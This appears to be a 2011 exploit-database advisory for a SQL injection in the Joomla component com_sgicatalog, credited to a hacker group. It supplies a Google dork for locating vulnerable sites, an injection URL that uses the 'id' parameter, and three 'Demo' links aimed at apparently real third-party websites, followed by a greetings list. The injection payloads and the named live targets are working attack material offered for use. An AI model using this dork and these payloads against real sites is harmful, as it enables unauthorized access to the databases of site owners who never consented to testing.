Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability

2011.10.12
Credit: BHG Security Center
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:index.php?option=com_sgicatalog

#### # Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability # Google Dork: inurl:index.php?option=com_sgicatalog # Date: 2011-10-12 # Author: BHG Security Center # Home: Http://black-hg.org # Software Link: http://joomlaapps.com/ # Version: 1.x # Tested on: [Windows XP- Persian] # CVE : Webapps #### [*] ExpLo!T : http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi] http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi] [*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' [*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' [*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' #### [+] Peace From #BHG Vunl Component : com_sgicatalog Error in file joomla Component (com_sgicatalog) Sql Injection A vulnerable parameter $ en&id= #### =================================**BHG Security Center**=====================================| # Greets To : | | Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili | cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y | s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ | ============================================================================================ |


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top